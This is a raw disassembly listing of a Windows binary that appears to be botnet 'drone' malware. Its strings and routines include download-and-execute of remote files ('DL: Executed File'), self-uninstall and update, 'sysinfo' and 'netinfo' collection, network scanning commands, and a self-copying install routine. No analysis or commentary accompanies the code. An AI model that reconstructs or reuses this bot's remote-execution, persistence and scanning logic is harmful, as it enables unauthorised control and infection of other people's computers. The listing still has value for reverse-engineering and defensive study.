push edi
call sub_417361
add esp, 20h
push dword ptr [esp+18h]
call ds:dword_41D0DC
cmp byte ptr [esp+34Bh], 1
jnz loc_41BB5E
cmp [esp+34Ch], bl
lea eax, [esp+24Bh]
jz short loc_41BAFD
push eax
call sub_419219
test al, al
pop ecx
lea eax, [esp+28h]
jz short loc_41BAF6
push offset aMainUninstalli ; "Main: Uninstalling Drone"
push eax
push dword ptr [esp+355h]
push edi
call sub_417361
add esp, 10h
lea eax, [esp+128h]
push eax
call sub_419477
loc_41BAEF: ; CODE XREF: J8@F_7_S:0041BA34�j
push offset aDlFailedBadLoc ; "DL: Failed; Bad Location."
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BAF6: ; CODE XREF: J8@F_7_S:0041BACA�j
push offset aDlFailedToUpda ; "DL: Failed To Update"
jmp short loc_41BB4D
; ---------------------------------------------------------------------------
loc_41BAFD: ; CODE XREF: J8@F_7_S:0041BABB�j
push 5
push ebx
push ebx
push eax
push offset byte_41EF0F
push ebx
call ds:dword_41D1E4
test eax, eax
jnz short loc_41BB19
push offset aDlErrorExecuti ; "DL: Error Executing File."
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BB19: ; CODE XREF: J8@F_7_S:0041BB10�j
lea eax, [esp+24Bh]
push eax
push offset aDlExecutedFile ; "DL: Executed File: %s"
lea eax, [esp+30h]
push eax
push dword ptr [esp+359h]
push edi
call sub_417361
add esp, 14h
jmp short loc_41BB5E
; ---------------------------------------------------------------------------
loc_41BB3D: ; CODE XREF: J8@F_7_S:0041B9B6�j
push offset aDlFailedBadUrl ; "DL: Failed; Bad URL"
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BB44: ; CODE XREF: J8@F_7_S:0041B9AE�j
push offset aDlFailedWinine ; "DL: Failed; WinINET Error"
loc_41BB49: ; CODE XREF: J8@F_7_S:0041BAF4�j
; J8@F_7_S:0041BB17�j ...
lea eax, [esp+2Ch]
loc_41BB4D: ; CODE XREF: J8@F_7_S:0041BAFB�j
push eax
push dword ptr [esp+355h]
push edi
call sub_417361
add esp, 10h
loc_41BB5E: ; CODE XREF: J8@F_7_S:0041BAA7�j
; J8@F_7_S:0041BB3B�j
call ds:dword_41D0E0
push eax
call sub_414042
pop ecx
mov ecx, [esp+75Ch]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB84 proc near ; CODE XREF: J8@F_7_S:0041C3B5�p
; J8@F_7_S:0041C3D1�p ...
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 108h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_104]
push 100h
push eax
mov dword ptr [esi], offset off_420A74
mov [ebp+var_108], esi
call sub_402AEE
mov eax, ds:dword_433C40
add esp, 0Ch
lea edx, [ebp+var_108]
push edx
mov ecx, offset dword_433C3C
push eax
push ecx
call sub_40121E
mov ecx, [ebp+var_4]
xor ecx, ebp
mov eax, esi
call sub_402710
leave
retn 4
sub_41BB84 endp
; ---------------------------------------------------------------------------
loc_41BBE3: ; CODE XREF: J8@F_7_S:004040AA�p
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 724h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+720h], eax
mov eax, [ebp+10h]
push ebx
push esi
push edi
mov [esp+10h], eax
call sub_419677
test al, al
jz short loc_41BC29
loc_41BC10: ; CODE XREF: J8@F_7_S:0041BDA1�j
; J8@F_7_S:0041BDCC�j ...
mov ecx, [esp+72Ch]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_41BC29: ; CODE XREF: J8@F_7_S:0041BC0E�j
call sub_4195EC
test al, al
jnz loc_41C061
call ds:dword_41D090
test eax, eax
jnz loc_41C061
mov esi, offset aIrn ; "--irn "
lea edi, [esp+248h]
movsd
movsw
movsb
mov edi, 103h
xor ebx, ebx
push edi
lea eax, [esp+625h]
push ebx
push eax
mov [esp+62Ch], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+415h]
push ebx
push eax
mov [esp+41Ch], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+30Dh]
push ebx
push eax
mov [esp+314h], bl
call sub_407B70
add esp, 0Ch
push 7Fh
lea eax, [esp+28Dh]
push ebx
push eax
mov [esp+294h], bl
call sub_407B70
add esp, 0Ch
push edi
lea eax, [esp+624h]
push eax
call ds:dword_41D0F4
push 80h
lea esi, [esp+28Ch]
mov ebx, offset byte_425061
call sub_4196D1
pop ecx
mov eax, esi
push eax
lea eax, [esp+624h]
push eax
push offset aSS_5 ; "%s\\%s"
lea eax, [esp+314h]
push edi
push eax
call sub_402AEE
lea eax, [esp+31Ch]
add esp, 14h
lea ecx, [eax+1]
loc_41BD11: ; CODE XREF: J8@F_7_S:0041BD16�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41BD11
sub eax, ecx
xor ebx, ebx
mov [esp+eax+308h], bl
mov esi, 104h
push esi
lea eax, [esp+414h]
push eax
push ebx
call ds:dword_41D0E4
push eax
call ds:dword_41D060
lea eax, [esp+248h]
lea ecx, [eax+1]
loc_41BD49: ; CODE XREF: J8@F_7_S:0041BD4E�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41BD49
sub eax, ecx
push eax
lea eax, [esp+24Ch]
push eax
push dword ptr [esp+18h]
call sub_4029E9
add esp, 0Ch
test eax, eax
jz short loc_41BDD1
push esi
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jz short loc_41BDD1
push ebx
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call ds:dword_41D080
test eax, eax
jz loc_41BC10
lea eax, [esp+410h]
push eax
lea eax, [esp+24Ch]
push eax
lea eax, [esp+310h]
push eax
push offset aSSS_0 ; "%s %s%s"
call sub_419219
add esp, 10h
jmp loc_41BC10
; ---------------------------------------------------------------------------
loc_41BDD1: ; CODE XREF: J8@F_7_S:0041BD69�j
; J8@F_7_S:0041BD86�j
lea eax, [esp+248h]
lea edx, [eax+1]
loc_41BDDB: ; CODE XREF: J8@F_7_S:0041BDE0�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41BDDB
sub eax, edx
push eax
lea eax, [esp+24Ch]
push eax
push dword ptr [esp+18h]
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz loc_41BE8C
push esi
lea eax, [esp+30Ch]
push eax
lea eax, [esp+418h]
push eax
call sub_4029E9
add esp, 0Ch
test eax, eax
jnz short loc_41BE8C
push edi
lea eax, [esp+51Dh]
push ebx
push eax
mov [esp+524h], bl
call sub_407B70
lea eax, [esp+254h]
add esp, 0Ch
lea edi, [eax+1]
loc_41BE41: ; CODE XREF: J8@F_7_S:0041BE46�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41BE41
mov ecx, [esp+10h]
sub eax, edi
add eax, ecx
push eax
push offset aS_11 ; "%s"
lea eax, [esp+520h]
push esi
push eax
call sub_402AEE
add esp, 10h
xor esi, esi
loc_41BE69: ; CODE XREF: J8@F_7_S:0041BE8A�j
lea eax, [esp+518h]
push eax
call ds:dword_41D0D0
test eax, eax
jnz short loc_41BE8C
push 0C8h
call ds:dword_41D0FC
inc esi
cmp esi, 3
jb short loc_41BE69
loc_41BE8C: ; CODE XREF: J8@F_7_S:0041BDFB�j
; J8@F_7_S:0041BE1C�j ...
push 80h
lea eax, [esp+28Ch]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push 37h
lea eax, [esp+255h]
push ebx
push eax
mov [esp+25Ch], bl
call sub_407B70
add esp, 0Ch
push 38h
lea esi, [esp+254h]
mov ebx, offset byte_4250E1
call sub_4196D1
pop ecx
mov eax, esi
push eax
push 1
xor ebx, ebx
push ebx
call ds:dword_41D084
push 38h
mov esi, eax
lea eax, [esp+254h]
push ebx
push eax
call sub_407B70
add esp, 0Ch
push 1388h
push esi
call ds:dword_41D07C
cmp eax, 102h
jnz short loc_41BF0D
push ebx
call ds:dword_41D050
loc_41BF0D: ; CODE XREF: J8@F_7_S:0041BF04�j
call sub_416F86
push 8
call sub_40304B
cmp eax, ebx
pop ecx
jz short loc_41BF31
push offset sub_417119
xor ecx, ecx
mov edi, offset aRm ; "RM"
mov esi, eax
call sub_4140AB
loc_41BF31: ; CODE XREF: J8@F_7_S:0041BF1C�j
lea eax, [esp+20h]
push eax
mov dword ptr [esp+24h], 94h
call ds:dword_41D068
cmp dword ptr [esp+24h], 4
jz short loc_41BF6A
push 8
call sub_40304B
cmp eax, ebx
pop ecx
jz short loc_41BF6A
push offset sub_419EA0
xor ecx, ecx
mov edi, offset aBk ; "BK"
mov esi, eax
call sub_4140AB
loc_41BF6A: ; CODE XREF: J8@F_7_S:0041BF49�j
; J8@F_7_S:0041BF55�j
push 8
mov ds:byte_4269C0, bl
call sub_40304B
cmp eax, ebx
pop ecx
jz short loc_41BF8F
push offset sub_418301
xor ecx, ecx
mov edi, offset aUnm ; "UNM"
mov esi, eax
call sub_4140AB
loc_41BF8F: ; CODE XREF: J8@F_7_S:0041BF7A�j
lea eax, [esp+0B8h]
push eax
push 202h
call ds:dword_41D274
test eax, eax
jnz loc_41C056
call sub_4192FB
mov ds:byte_433945, bl
call sub_41B775
mov eax, [ebp+8]
mov ds:byte_4268B4, bl
mov ds:dword_4266A4, eax
call sub_418D17
mov eax, ds:dword_433C40
mov eax, [eax]
mov ebx, offset dword_433C3C
mov [esp+14h], eax
mov [esp+10h], ebx
loc_41BFE1: ; CODE XREF: J8@F_7_S:0041C00C�j
cmp dword ptr [esp+10h], 0
mov esi, ds:dword_433C40
jz short loc_41BFF4
cmp [esp+10h], ebx
jz short loc_41BFF9
loc_41BFF4: ; CODE XREF: J8@F_7_S:0041BFEC�j
call sub_402F5D
loc_41BFF9: ; CODE XREF: J8@F_7_S:0041BFF2�j
cmp [esp+14h], esi
jz short loc_41C00E
lea edi, [esp+18h]
lea esi, [esp+10h]
call sub_40168C
jmp short loc_41BFE1
; ---------------------------------------------------------------------------
loc_41C00E: ; CODE XREF: J8@F_7_S:0041BFFD�j
mov esi, offset dword_4269BC
loc_41C013: ; CODE XREF: J8@F_7_S:0041C054�j
movsx eax, ds:word_424E48
push eax
push offset dword_424C48
mov edx, offset dword_424A48
mov ecx, esi
call sub_41802F
test al, al
jz short loc_41C042
mov ds:byte_4269C0, 1
loc_41C037: ; CODE XREF: J8@F_7_S:0041C040�j
mov ecx, esi
call sub_417F01
test al, al
jnz short loc_41C037
loc_41C042: ; CODE XREF: J8@F_7_S:0041C02E�j
push 3A98h
mov ds:byte_4269C0, 0
call ds:dword_41D0FC
jmp short loc_41C013
; ---------------------------------------------------------------------------
loc_41C056: ; CODE XREF: J8@F_7_S:0041BFA4�j
call ds:dword_41D244
jmp loc_41BC10
; ---------------------------------------------------------------------------
loc_41C061: ; CODE XREF: J8@F_7_S:0041BC30�j
; J8@F_7_S:0041BC3E�j
push offset byte_41EF17
call sub_419477
; ---------------------------------------------------------------------------
db 5 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_41C070 proc near ; CODE XREF: sub_418DA0+2F�p
; sub_418DA0+6C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_41C091
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_41C091: ; CODE XREF: sub_41C070+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_41C0AD
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_41C0AD: ; CODE XREF: sub_41C070+27�j
or eax, eax
jnz short loc_41C0C9
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_41C10A
; ---------------------------------------------------------------------------
loc_41C0C9: ; CODE XREF: sub_41C070+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_41C0D7: ; CODE XREF: sub_41C070+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_41C0D7
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
add edx, ecx
jb short loc_41C105
cmp edx, [esp+0Ch+arg_4]
ja short loc_41C105
jb short loc_41C106
cmp eax, [esp+0Ch+arg_0]
jbe short loc_41C106
loc_41C105: ; CODE XREF: sub_41C070+85�j
; sub_41C070+8B�j
dec esi
loc_41C106: ; CODE XREF: sub_41C070+8D�j
; sub_41C070+93�j
xor edx, edx
mov eax, esi
loc_41C10A: ; CODE XREF: sub_41C070+57�j
dec edi
jnz short loc_41C114
neg edx
neg eax
sbb edx, 0
loc_41C114: ; CODE XREF: sub_41C070+9B�j
pop ebx
pop esi
pop edi
retn 10h
sub_41C070 endp
; ---------------------------------------------------------------------------
align 10h
cmp ds:dword_433C7C, 0
jz short sub_41C156
loc_41C129: ; CODE XREF: J8@F_7_S:0041C154�j
push ebp
mov ebp, esp
sub esp, 8
and esp, 0FFFFFFF8h
fstp qword ptr [esp]
cvttsd2si eax, qword ptr [esp]
leave
retn
; ---------------------------------------------------------------------------
cmp ds:dword_433C7C, 0
jz short sub_41C156
sub esp, 4
fnstcw word ptr [esp]
pop eax
and ax, 7Fh
cmp ax, 7Fh
jz short loc_41C129
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C156 proc near ; CODE XREF: sub_41A9DE+5AB�p
; J8@F_7_S:0041C127�j ...
var_20 = dword ptr -20h
var_10 = qword ptr -10h
var_8 = dword ptr -8
push ebp
mov ebp, esp
sub esp, 20h
and esp, 0FFFFFFF0h
fld st
fst [esp+20h+var_8]
fistp [esp+20h+var_10]
fild [esp+20h+var_10]
mov edx, [esp+20h+var_8]
mov eax, dword ptr [esp+20h+var_10]
test eax, eax
jz short loc_41C1B5
loc_41C179: ; CODE XREF: sub_41C156+69�j
fsubp st(1), st
test edx, edx
jns short loc_41C19D
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
xor ecx, 80000000h
add ecx, 7FFFFFFFh
adc eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
adc edx, 0
jmp short locret_41C1C9
; ---------------------------------------------------------------------------
loc_41C19D: ; CODE XREF: sub_41C156+27�j
fstp [esp+20h+var_20]
mov ecx, [esp+20h+var_20]
add ecx, 7FFFFFFFh
sbb eax, 0
mov edx, dword ptr [esp+20h+var_10+4]
sbb edx, 0
jmp short locret_41C1C9
; ---------------------------------------------------------------------------
loc_41C1B5: ; CODE XREF: sub_41C156+21�j
mov edx, dword ptr [esp+20h+var_10+4]
test edx, 7FFFFFFFh
jnz short loc_41C179
fstp [esp+20h+var_8]
fstp [esp+20h+var_8]
locret_41C1C9: ; CODE XREF: sub_41C156+45�j
; sub_41C156+5D�j
leave
retn
sub_41C156 endp
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_401137
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-54h]
xor ecx, eax
call sub_402710
mov eax, offset dword_4212B8
jmp loc_40428E
; ---------------------------------------------------------------------------
loc_41C1EE: ; DATA XREF: sub_40B4B4+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421658
jmp loc_40428E
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-1Ch]
xor ecx, eax
call sub_402710
mov eax, offset dword_421AB8
jmp loc_40428E
; ---------------------------------------------------------------------------
mov ecx, [ebp-10h]
jmp sub_402CCA
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421AE8
jmp loc_40428E
; ---------------------------------------------------------------------------
lea ecx, [ebp-2Ch]
jmp loc_401137
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-58h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B18
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-10h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C274: ; DATA XREF: sub_41B775+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421A00
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-10h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C299: ; DATA XREF: sub_418D17+2�o
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-14h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421A2C
jmp loc_40428E
; ---------------------------------------------------------------------------
lea ecx, [ebp-28h]
jmp loc_401137
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-54h]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B48
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-58h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-70h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421B78
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-4BCh]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-4C8h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421BA8
jmp loc_40428E
; ---------------------------------------------------------------------------
push dword ptr [ebp-4C0h]
call sub_402F6D
pop ecx
retn
; ---------------------------------------------------------------------------
mov edx, [esp+8]
lea eax, [edx+0Ch]
mov ecx, [edx-4C8h]
xor ecx, eax
call sub_402710
mov ecx, [edx-4]
xor ecx, eax
call sub_402710
mov eax, offset dword_421BD8
jmp loc_40428E
; ---------------------------------------------------------------------------
loc_41C370: ; DATA XREF: J8@F_7_S:0041D28C�o
call sub_401291
and ds:dword_433C44, 0
push offset loc_41C498
mov ds:dword_433C40, eax
call sub_402E21
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C38D: ; DATA XREF: J8@F_7_S:0041D290�o
call sub_40172D
and ds:dword_433C50, 0
push offset loc_41C4E1
mov ds:dword_433C4C, eax
call sub_402E21
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C3AA: ; DATA XREF: J8@F_7_S:0041D294�o
push esi
push offset aDownload ; "download"
mov esi, offset dword_433C58
call sub_41BB84
mov ds:dword_433C58, offset off_420AE4
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3C6: ; DATA XREF: J8@F_7_S:0041D298�o
push esi
push offset aUpdate ; "update"
mov esi, offset dword_433C54
call sub_41BB84
mov ds:dword_433C54, offset off_420AEC
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3E2: ; DATA XREF: J8@F_7_S:0041D29C�o
push esi
push offset aHttp ; "http"
mov esi, offset dword_433C5C
call sub_41BB84
mov ds:dword_433C5C, offset off_420B04
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C3FE: ; DATA XREF: J8@F_7_S:0041D2A0�o
push esi
push offset aSysinfo ; "sysinfo"
mov esi, offset dword_433C60
call sub_41BB84
mov ds:dword_433C60, offset off_420BC4
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C41A: ; DATA XREF: J8@F_7_S:0041D2A4�o
push esi
push offset aNetinfo ; "netinfo"
mov esi, offset dword_433C64
call sub_41BB84
mov ds:dword_433C64, offset off_420BCC
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C436: ; DATA XREF: J8@F_7_S:0041D2A8�o
mov eax, ds:dword_424644
add eax, 6
mov ds:dword_433C68, eax
retn
; ---------------------------------------------------------------------------
loc_41C444: ; DATA XREF: J8@F_7_S:0041D2AC�o
push esi
push offset aScan_start ; "scan.start"
mov esi, offset dword_433C74
call sub_41BB84
mov ds:dword_433C74, offset off_420D1C
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C460: ; DATA XREF: J8@F_7_S:0041D2B0�o
push esi
push offset aScan_stop ; "scan.stop"
mov esi, offset dword_433C6C
call sub_41BB84
mov ds:dword_433C6C, offset off_420D24
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C47C: ; DATA XREF: J8@F_7_S:0041D2B4�o
push esi
push offset dword_41EEF0
mov esi, offset dword_433C70
call sub_41BB84
mov ds:dword_433C70, offset off_420D2C
pop esi
retn
; ---------------------------------------------------------------------------
loc_41C498: ; DATA XREF: J8@F_7_S:0041C37C�o
mov eax, ds:dword_433C40
mov ecx, [eax]
mov [eax], eax
mov eax, ds:dword_433C40
mov [eax+4], eax
and ds:dword_433C44, 0
cmp ecx, ds:dword_433C40
jz short loc_41C4CD
push esi
loc_41C4B9: ; CODE XREF: J8@F_7_S:0041C4CA�j
mov esi, [ecx]
push ecx
call sub_402F6D
cmp esi, ds:dword_433C40
pop ecx
mov ecx, esi
jnz short loc_41C4B9
pop esi
loc_41C4CD: ; CODE XREF: J8@F_7_S:0041C4B6�j
push ds:dword_433C40
call sub_402F6D
and ds:dword_433C40, 0
pop ecx
retn
; ---------------------------------------------------------------------------
loc_41C4E1: ; DATA XREF: J8@F_7_S:0041C399�o
mov eax, ds:dword_433C4C
mov ecx, [eax]
mov [eax], eax
mov eax, ds:dword_433C4C
mov [eax+4], eax
and ds:dword_433C50, 0
cmp ecx, ds:dword_433C4C
jz short loc_41C516
push esi
loc_41C502: ; CODE XREF: J8@F_7_S:0041C513�j
mov esi, [ecx]
push ecx
call sub_402F6D
cmp esi, ds:dword_433C4C
pop ecx
mov ecx, esi
jnz short loc_41C502
pop esi
loc_41C516: ; CODE XREF: J8@F_7_S:0041C4FF�j
push ds:dword_433C4C
call sub_402F6D
and ds:dword_433C4C, 0
pop ecx
retn
; ---------------------------------------------------------------------------
mov ds:dword_425A84, offset off_41D314
mov ecx, offset dword_425A84
jmp sub_402CCA
; ---------------------------------------------------------------------------
align 1000h
J8@F_7_S ends
; Section 2. (virtual address 0001D000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 0001D000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
J8@F_7_S segment para public 'BSS' use32
assume cs:J8@F_7_S
;org 41D000h
assume es:nothing, ss:nothing, ds:J8@F_7_S, fs:nothing, gs:nothing
dword_41D000 dd 381762h ; DATA XREF: sub_416F32+39�r
dword_41D004 dd 38179Bh ; DATA XREF: sub_416E5F+1D�r
; sub_416F32+1B�r
dword_41D008 dd 3817EBh ; DATA XREF: sub_416ECD+31�r
dword_41D00C dd 38183Fh ; DATA XREF: sub_416E5F+52�r
dword_41D010 dd 381872h ; DATA XREF: sub_416E5F+2A�r
; sub_416E5F+60�r ...
dword_41D014 dd 381894h ; DATA XREF: sub_419835+3C�r
dword_41D018 dd 3818E7h ; DATA XREF: sub_419C6D+A5�r
; sub_419C6D+1B6�r
dword_41D01C dd 38191Bh ; DATA XREF: sub_419760+82�r
dword_41D020 dd 38193Fh ; DATA XREF: sub_419A9F+132�r
dword_41D024 dd 381991h ; DATA XREF: sub_419C1D+C�r
dword_41D028 dd 3819B5h ; DATA XREF: sub_419760+24�r
dword_41D02C dd 3819E8h ; DATA XREF: sub_416ECD+14�r
; sub_419A9F+90�r ...
dword_41D030 dd 381A42h ; DATA XREF: sub_419EA0+299�r
dword_41D034 dd 381A67h ; DATA XREF: sub_419835+19�r
dword_41D038 dd 381ABEh ; DATA XREF: sub_419EA0+27D�r
dword_41D03C dd 381AF9h ; DATA XREF: sub_419C1D+2E�r
dword_41D040 dd 381B1Dh ; DATA XREF: sub_419C1D+3B�r
dword_41D044 dd 381B41h ; DATA XREF: sub_419C1D+1E�r
dd 381B65h, 0
dword_41D050 dd 380000h ; DATA XREF: sub_4078A7+E�r
; sub_419477+168�r ...
dword_41D054 dd 380045h ; DATA XREF: sub_4102B0+22�r
; sub_418E1F+29�r
dword_41D058 dd 380099h ; DATA XREF: sub_40B08A+5D�r
; sub_418DA0+B�r
dword_41D05C dd 3800E4h ; DATA XREF: sub_419219+8B�r
dword_41D060 dd 380162h ; DATA XREF: sub_409AB4+99�r
; sub_40AE54+2A�r ...
dword_41D064 dd 3801C6h ; DATA XREF: sub_418DA0+19�r
dword_41D068 dd 380230h ; DATA XREF: J8@F_7_S:00403F86�r
; sub_418E51+24�r ...
dword_41D06C dd 380296h ; DATA XREF: sub_40E072+234�r
; sub_41142B+13�r ...
dword_41D070 dd 3802CCh ; DATA XREF: sub_418552+31E�r
dword_41D074 dd 38031Eh ; DATA XREF: sub_40CCBE+40�r
; sub_41075B+2D�r ...
dword_41D078 dd 38035Ch ; DATA XREF: sub_409DAD+17F�r
; sub_409DAD+2A3�r ...
dword_41D07C dd 380380h ; DATA XREF: sub_4140AB+5E�r
; sub_41A9DE+6CD�r ...
dword_41D080 dd 3803B2h ; DATA XREF: J8@F_7_S:0041BD99�r
dword_41D084 dd 3803F8h ; DATA XREF: J8@F_7_S:0041BED8�r
dword_41D088 dd 380440h ; DATA XREF: sub_409AB4+194�r
; sub_40CE5A+212�r ...
dword_41D08C dd 380464h ; DATA XREF: sub_41B3D0+20�r
; sub_41B5D2+43�r
dword_41D090 dd 380489h ; DATA XREF: sub_40468E+B9�r
; sub_419477+16F�r ...
dword_41D094 dd 3804AAh ; DATA XREF: sub_414023+8�r
dd 3804C8h
dword_41D09C dd 380530h ; DATA XREF: sub_41A9DE+63F�r
dword_41D0A0 dd 380579h ; DATA XREF: sub_409DAD+3E7�r
; sub_40BF57:loc_40C004�r ...
dword_41D0A4 dd 3805C8h ; DATA XREF: sub_41A5C1+2C3�r
dword_41D0A8 dd 3805F1h ; DATA XREF: sub_4105A7+14C�r
dword_41D0AC dd 380640h ; DATA XREF: sub_4104DC+45�r
dword_41D0B0 dd 380686h ; DATA XREF: sub_4104DC+78�r
dword_41D0B4 dd 38070Fh ; DATA XREF: sub_4104DC+9B�r
dword_41D0B8 dd 380748h ; DATA XREF: sub_40F04F+8C�r
dword_41D0BC dd 38079Ah ; DATA XREF: sub_40EC7F:loc_40ECD3�r
; sub_40ECFC:loc_40ED54�r
dword_41D0C0 dd 3807D1h ; DATA XREF: sub_4195EC+39�r
dword_41D0C4 dd 3807F6h ; DATA XREF: sub_4195EC+50�r
dword_41D0C8 dd 380864h ; DATA XREF: sub_4195EC+6F�r
dword_41D0CC dd 38089Ah ; DATA XREF: sub_40468E+F5�r
; sub_4195EC+13�r
dword_41D0D0 dd 3808B0h ; DATA XREF: sub_419E55+20�r
; J8@F_7_S:0041BE71�r
dword_41D0D4 dd 3808CEh ; DATA XREF: sub_419948+3B�r
dword_41D0D8 dd 380906h ; DATA XREF: sub_4199AC+3B�r
dword_41D0DC dd 380942h ; DATA XREF: sub_408A4D+4B�r
; sub_40E072+29C�r ...
dword_41D0E0 dd 38097Ch ; DATA XREF: sub_40531A+60�r
; sub_4054D6+169�r ...
dword_41D0E4 dd 380994h ; DATA XREF: sub_405127+39�r
; sub_405193+39�r ...
dword_41D0E8 dd 3809BAh ; DATA XREF: sub_40F524+2D�r
; sub_419677+30�r ...
dword_41D0EC dd 3809E9h ; DATA XREF: sub_405127+49�r
; sub_405193+49�r ...
dword_41D0F0 dd 380A40h ; DATA XREF: sub_40531A+2�r
; sub_408A4D+55�r ...
dword_41D0F4 dd 380A60h ; DATA XREF: sub_416F86+D1�r
; sub_417119+A6�r ...
dword_41D0F8 dd 380AB6h ; DATA XREF: sub_40468E+FC�r
; sub_419E55+8�r
dword_41D0FC dd 380AD3h ; DATA XREF: sub_40773A+1D�r
; sub_40777A+25�r ...
dword_41D100 dd 380AFEh ; DATA XREF: J8@F_7_S:00403F61�r
; sub_4105A7+67�r ...
dword_41D104 dd 380B2Dh ; DATA XREF: sub_419EA0:loc_41A108�r
dword_41D108 dd 380B40h ; DATA XREF: sub_40B08A+51�r
; sub_41748B+36�r ...
dword_41D10C dd 380B6Bh ; DATA XREF: J8@F_7_S:00403F96�r
; J8@F_7_S:00403FBF�r ...
dword_41D110 dd 380BA0h ; DATA XREF: sub_4140AB+1C�r
; sub_41B5D2+161�r
dword_41D114 dd 380BF6h ; DATA XREF: sub_4036E0+F�r
; J8@F_7_S:00403F6A�r ...
dword_41D118 dd 380C1Dh ; DATA XREF: sub_40CE5A+11D�r
dword_41D11C dd 380C45h ; DATA XREF: sub_40CE5A:loc_40CF93�r
